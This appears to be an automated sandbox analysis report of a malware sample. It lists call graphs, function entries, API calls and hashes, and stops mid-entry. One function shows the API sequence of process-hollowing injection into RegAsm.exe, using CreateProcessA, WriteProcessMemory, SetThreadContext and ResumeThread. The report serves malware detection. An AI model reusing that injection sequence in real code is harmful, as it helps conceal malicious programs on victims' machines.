                                                                                                                                                                                                                                  execution_graph 461 590b78 462 590b86 461->462 465 590bd0 462->465 463 590ba3 469 590c14 465->469 466 590f3c 466->463 467 590fab VirtualProtect 468 590fe8 467->468 468->463 469->466 469->467 470 590988 471 59099d 470->471 473 590a73 471->473 474 590500 471->474 475 590f60 VirtualProtect 474->475 477 590fe8 475->477 477->473 489 59097a 490 59099d 489->490 491 590500 VirtualProtect 490->491 492 590a73 490->492 491->492 478 24c21a5 479 24c21dd CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 478->479 481 24c23ba WriteProcessMemory 479->481 482 24c23ff 481->482 483 24c2404 WriteProcessMemory 482->483 484 24c2441 WriteProcessMemory Wow64SetThreadContext ResumeThread 482->484 483->482 485 590b57 486 590b86 485->486 488 590bd0 VirtualProtect 486->488 487 590ba3 488->487

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_0059045C 1 Function_00590450 2 Function_00590052 3 Function_00590154 4 Function_00590254 5 Function_00590354 6 Function_00590B57 66 Function_00590BD0 6->66 7 Function_00590148 8 Function_00590848 9 Function_00590348 10 Function_001FD006 11 Function_00590540 12 Function_00590B40 13 Function_00590444 14 Function_00590244 15 Function_00590479 16 Function_00590378 17 Function_00590278 18 Function_00590178 19 Function_00590B78 19->66 20 Function_0059097A 43 Function_0059050C 20->43 48 Function_00590500 20->48 79 Function_005904F4 20->79 21 Function_0059047D 22 Function_00590070 23 Function_00590475 24 Function_00590468 25 Function_0059026C 26 Function_0059036C 27 Function_00590060 28 Function_00590260 29 Function_00590360 30 Function_00590563 31 Function_00590165 32 Function_00590519 33 Function_00590318 34 Function_0059051D 35 Function_024C2809 36 Function_0059011C 37 Function_001FD059 38 Function_0059001E 39 Function_024C2605 40 Function_00591010 41 Function_00590214 42 Function_00590208 44 Function_0059010C 45 Function_0059030C 46 Function_00590300 47 Function_00590100 49 Function_00590006 50 Function_0059033C 51 Function_0059013C 52 Function_00590330 53 Function_00590434 54 Function_00590234 55 Function_0059012C 56 Function_00590521 57 Function_024C2530 58 Function_024C2630 59 Function_001FD163 60 Function_00590525 61 Function_00590224 62 Function_00590324 63 Function_005908D8 64 Function_024C25C8 65 Function_005902DC 67 Function_005902D0 68 Function_005901D5 69 Function_005900D4 70 Function_005900C8 71 Function_001FD18C 72 Function_001FD187 73 Function_005901C0 74 Function_005902C4 75 Function_005901F8 76 Function_005900F0 77 Function_024C25E0 78 Function_024C26E1 80 Function_005902F4 81 Function_024C25FD 82 Function_005908E8 83 Function_005902E8 84 Function_005901EA 85 Function_005900E4 86 Function_00590499 87 Function_00590198 88 Function_0059049D 89 Function_0059029D 90 Function_024C2589 91 Function_0059039C 92 Function_00590491 93 Function_00590090 94 Function_00590390 95 Function_00590495 96 Function_00590489 97 Function_00590988 97->43 97->48 97->79 98 Function_00590188 99 Function_0059048D 100 Function_00590481 101 Function_00590080 102 Function_00590485 103 Function_00590284 104 Function_00590384 105 Function_005904B8 106 Function_005900BC 107 Function_024C21A5 108 Function_005900B0 109 Function_005902B4 110 Function_005901B4 111 Function_005901A8 112 Function_024C25B8 113 Function_005900A0 114 Function_001FD0E1 115 Function_001FD0E0

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 024C21A5 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024C2117,024C2107), ref: 024C2314
                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024C2327
                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 024C2345
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(000003AC,?,024C215B,00000004,00000000), ref: 024C2369
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 024C2394
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 024C23EC
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 024C2437
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000003AC,-00000008,?,00000004,00000000), ref: 024C2475
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(000003A8,024A0000), ref: 024C24B1
                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(000003A8), ref: 024C24C0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1971899594.00000000024C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C2000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_24c2000_Yt_9y5LuIpBZXKd9EiYluKkG.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                  • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                  • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                  • Instruction ID: 69fe6deb1bc0a295dd052506eefdd9d06a1e2005cf7b028d90fc217bddc1265a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76B1E57660028AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB341D774FA418B94
                                                                                                                                                                                                                                  Function 00590BD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 23 590bd0-590c37 26 590cd8-590ce6 23->26 27 590c3d-590c40 23->27 28 590cec-590cf4 26->28 29 590da2-590db8 26->29 30 590c48-590c56 27->30 33 590cfa-590d0d 28->33 34 590f46-590fe6 VirtualProtect 28->34 31 590f3c-590f43 29->31 32 590dbe-590ddc 29->32 30->34 43 590c5c-590ca7 30->43 35 590dde-590de4 32->35 36 590de5-590df0 32->36 33->34 37 590d13-590d1f 33->37 51 590fe8 34->51 52 590fed-591001 34->52 35->36 36->34 39 590df6-590e02 36->39 41 590d28-590d59 37->41 42 590d21-590d27 37->42 44 590e0b-590e12 39->44 45 590e04-590e0a 39->45 41->34 47 590d5f-590d69 41->47 42->41 43->34 49 590cad-590cbe 43->49 44->34 50 590e18-590e22 44->50 45->44 47->34 48 590d6f-590d79 47->48 48->34 53 590d7f-590d85 48->53 49->34 54 590cc4-590cd2 49->54 50->34 55 590e28-590e32 50->55 51->52 53->34 56 590d8b-590d9c 53->56 54->26 54->27 55->34 57 590e38-590e3e 55->57 56->28 56->29 57->34 58 590e44-590e50 57->58 58->34 59 590e56-590e67 58->59 60 590e69-590e6f 59->60 61 590e70-590eef 59->61 60->61 69 590ef1-590efa 61->69 70 590f05-590f1c 61->70 69->70 71 590efc-590f03 69->71 72 590f27-590f36 70->72 71->72 72->31 72->32
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(034C3590,?,00000001,0000012C,?,?,?,00000000,00000000,?,00590A73,00000001,00000040), ref: 00590FD9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1825992793.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_590000_Yt_9y5LuIpBZXKd9EiYluKkG.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                  • String ID: &S!$<1i;
                                                                                                                                                                                                                                  • API String ID: 544645111-1770337207
                                                                                                                                                                                                                                  • Opcode ID: f641017aebc00de9a7e904d2812a8dbcdf80d79015cf0ff8521808dd6470aff8
                                                                                                                                                                                                                                  • Instruction ID: d65fe0a68b93f7c070a95f0a74501ad36fa816180f493d776da4ab985edf0f83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f641017aebc00de9a7e904d2812a8dbcdf80d79015cf0ff8521808dd6470aff8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61C18F70A042599FCF11CFA9C9806EDFBF2BF48310F248599E458AB286D7309E45CFA4
                                                                                                                                                                                                                                  Function 00590500 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 154 590500-590fe6 VirtualProtect 157 590fe8 154->157 158 590fed-591001 154->158 157->158
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(034C3590,?,00000001,0000012C,?,?,?,00000000,00000000,?,00590A73,00000001,00000040), ref: 00590FD9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1825992793.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_590000_Yt_9y5LuIpBZXKd9EiYluKkG.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                  • Opcode ID: 2b29689f40913a6d6e0ca66999672afda47f5a8896c5209fd25bbcd838d33ea5
                                                                                                                                                                                                                                  • Instruction ID: 1eeeb593286fef3760fdfb396b81c33885346977878a044f1043f81de7e96eab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b29689f40913a6d6e0ca66999672afda47f5a8896c5209fd25bbcd838d33ea5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5921F4B5D0121DAFCB10CF9AC884BDEFBB4FB08310F10852AE918A7240C375AA54CFA5
                                                                                                                                                                                                                                  Function 001FD006 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 159 1fd006-1fd035 160 1fd037-1fd049 159->160 162 1fd04b-1fd079 160->162 166 1fd07b-1fd086 162->166 167 1fd0c9-1fd0d1 162->167 168 1fd0be-1fd0c5 166->168 169 1fd088-1fd096 166->169 167->166 168->169 174 1fd0c7 168->174 172 1fd09c 169->172 173 1fd09f-1fd0a7 172->173 175 1fd0a9-1fd0b1 173->175 176 1fd0b7-1fd0bc 173->176 174->173 176->175
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1825582575.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1fd000_Yt_9y5LuIpBZXKd9EiYluKkG.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 53e5e1bb7c749a0d8b5224fcb6e820e30a4dfa9f940f22a905f024c83e783e12
                                                                                                                                                                                                                                  • Instruction ID: 86791ec607fd22dbab63b6e8d088ac7923f050689a68d233225560366766eeba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53e5e1bb7c749a0d8b5224fcb6e820e30a4dfa9f940f22a905f024c83e783e12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3821F22154E3D44FD7038B219CA4662BFB49F53224F1E81CBE988CF1A7C66A8C49C772
                                                                                                                                                                                                                                  Function 001FD059 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 178 1fd059-1fd079 179 1fd07b-1fd086 178->179 180 1fd0c9-1fd0d1 178->180 181 1fd0be-1fd0c5 179->181 182 1fd088-1fd096 179->182 180->179 181->182 187 1fd0c7 181->187 185 1fd09c 182->185 186 1fd09f-1fd0a7 185->186 188 1fd0a9-1fd0b1 186->188 189 1fd0b7-1fd0bc 186->189 187->186 189->188
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1825582575.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1fd000_Yt_9y5LuIpBZXKd9EiYluKkG.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a18968a493e66488554996efa70833ee699133686dd7073f2d3e7e6fe37e7b71
                                                                                                                                                                                                                                  • Instruction ID: bc211183ea5387b1e7798e48781a7698c52998c24d7c8a65c45f6b883349415b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a18968a493e66488554996efa70833ee699133686dd7073f2d3e7e6fe37e7b71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9901A7315087489BE7148B26ED84B76BB99DF41320F18855AFE094A286CB769841C676

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 0040BA15 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4
                                                                                                                                                                                                                                  • API String ID: 0-4088798008
                                                                                                                                                                                                                                  • Opcode ID: 9e629b54cac9a451dd8cf4de9c3dc0aa672878143de544fc65e081d80f5981e0
                                                                                                                                                                                                                                  • Instruction ID: 06e1ceb854ef84b575a7962212db0659957610df23ecc174af10c1a64159b46f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e629b54cac9a451dd8cf4de9c3dc0aa672878143de544fc65e081d80f5981e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E37148B8A04758DFCB10CF49D084A9EBBF0FB8D314F11855AE999AB360C374A945DF86
                                                                                                                                                                                                                                  Function 0040EDE7 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: DDw
                                                                                                                                                                                                                                  • API String ID: 0-3534131856
                                                                                                                                                                                                                                  • Opcode ID: a1f967f7eba258def362798758692de9abbaaf3de280747deb2ecacb4f8d8fa3
                                                                                                                                                                                                                                  • Instruction ID: ff4cb255bcfa3961e0fe95926e445b576633eec2521502d053448acf3f930ea5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1f967f7eba258def362798758692de9abbaaf3de280747deb2ecacb4f8d8fa3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F31D7B9C0125D9BCB11CFA5C5808DEBBF8BB08354F50462BE816A7240EB75AA49CF95
                                                                                                                                                                                                                                  Function 0040F973 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: epw
                                                                                                                                                                                                                                  • API String ID: 0-1342393776
                                                                                                                                                                                                                                  • Opcode ID: 754dbfdf68d6ce22778d702b36364a1a9da8e9d412cd0c6968cf2823b2018a77
                                                                                                                                                                                                                                  • Instruction ID: ad3cf9416c7fe639c0b2a46fbb163d31bb65300bf1d5073a3f6caef6081422cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 754dbfdf68d6ce22778d702b36364a1a9da8e9d412cd0c6968cf2823b2018a77
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5731DAB9D0125D9BCB11CFA5D5809DEBBF8BB08354F50462BEC16A7200EB75AA49CF90
                                                                                                                                                                                                                                  Function 00434A87 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Qbw
                                                                                                                                                                                                                                  • API String ID: 0-194342959
                                                                                                                                                                                                                                  • Opcode ID: 0fc2c5184d5dfd8847d7632d2e919ac56bbdabb92e077718b9cbb503e67fbc8d
                                                                                                                                                                                                                                  • Instruction ID: 9c1351d4b6caf7e1237ee6c664253fa6904c16cce53cb7fca03acf8668862632
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc2c5184d5dfd8847d7632d2e919ac56bbdabb92e077718b9cbb503e67fbc8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F0C2B490021E9BCF00EF98C5859EEBBF4FB88354F504926D825E7340E778EA45CBA5
                                                                                                                                                                                                                                  Function 00402EDF Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 760896b2aee56d0295996270ef9d4f7026b21dbcd13450151500debee2736954
                                                                                                                                                                                                                                  • Instruction ID: a7bbc802fe2571180ce02fed74db587fe8b2022bbcb9d549d90974f4b141ae82
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 760896b2aee56d0295996270ef9d4f7026b21dbcd13450151500debee2736954
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32F11A78A04B58CFCB60CF58D480A89BBF0FF4D310F51859AE999A7325DB31A994DF42
                                                                                                                                                                                                                                  Function 0040D5EF Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d05d5b55ab5d281bf43c0400ee2bb0740eec87947755b1b6c9e3bdbbfd5912aa
                                                                                                                                                                                                                                  • Instruction ID: 03cc52901bbfb8bf9bf7738f347d42c743177a143523bf09c2e8cbf2a7f54d2f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d05d5b55ab5d281bf43c0400ee2bb0740eec87947755b1b6c9e3bdbbfd5912aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30E10678A04718DFCB14CF59C580A89BBF1BF8D360F11859AE989AB325D730E981DF91
                                                                                                                                                                                                                                  Function 00419A2E Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 464e27582cf6649143c0fd40e555fbee6f24d4b89e54a209db8efc06fdb022a7
                                                                                                                                                                                                                                  • Instruction ID: 3457ff29f82d20b5d8fd5121ec820f28e15921cbff36a6e0af6e117ffa7c0722
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 464e27582cf6649143c0fd40e555fbee6f24d4b89e54a209db8efc06fdb022a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE10478A04718DFCB14CF59C580A89BBF1BF8D360F11859AE999AB325D330E981DF81
                                                                                                                                                                                                                                  Function 00419544 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9fd867ddaa1f141ebbc3329754c4bcf66b1d5991ab85ac2f7853ca91ad7ed731
                                                                                                                                                                                                                                  • Instruction ID: 216e2d8daa721d26c273130998637a1db3e7d4624dee62b8437dbab3185c5531
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fd867ddaa1f141ebbc3329754c4bcf66b1d5991ab85ac2f7853ca91ad7ed731
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A1E278A05B089FCB40CF59D180A89BBF0FF8E350F118499EA99AB321D374E945EF51
                                                                                                                                                                                                                                  Function 0041C230 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 69adc9dc28d3a5cebaf1e2920021f099cdcc5ee1f02bb66172ba3b1724f8f00b
                                                                                                                                                                                                                                  • Instruction ID: 80c034c2c5d00b8435276db71de84e7156c0b827479e61c4431c7afec51ddb72
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69adc9dc28d3a5cebaf1e2920021f099cdcc5ee1f02bb66172ba3b1724f8f00b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99911378A04B48DFCB50CF59D184A99BBF0FB8D360F11849AEA89AB321D774E944DF41
                                                                                                                                                                                                                                  Function 00420079 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0657d2327114765cf6d50e64ab17ca49d699a81d6b4fb72a2de315787d3f14f3
                                                                                                                                                                                                                                  • Instruction ID: 6ebaac531283eb5d9ae5243599f8039e98a63473c7fc68d02e89d4888494c773
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0657d2327114765cf6d50e64ab17ca49d699a81d6b4fb72a2de315787d3f14f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C81E4B8A05B58DFCB14CF99D18088EBBF1BF8D310F21855AEA59A7324D370A945DF81
                                                                                                                                                                                                                                  Function 004037CE Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ec19c74fb9316e13c4f028af8222f94e0693e8388907715692105a9d2ce4b480
                                                                                                                                                                                                                                  • Instruction ID: 71d0003b2dbb1160d170c763ad233959574526ac00172b924ce6207cdf3cf275
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec19c74fb9316e13c4f028af8222f94e0693e8388907715692105a9d2ce4b480
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98817E78A04758CFCB20DF19C580A89BBF0FF8D700F51899AE999A7321D730A995DF42
                                                                                                                                                                                                                                  Function 0041808F Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
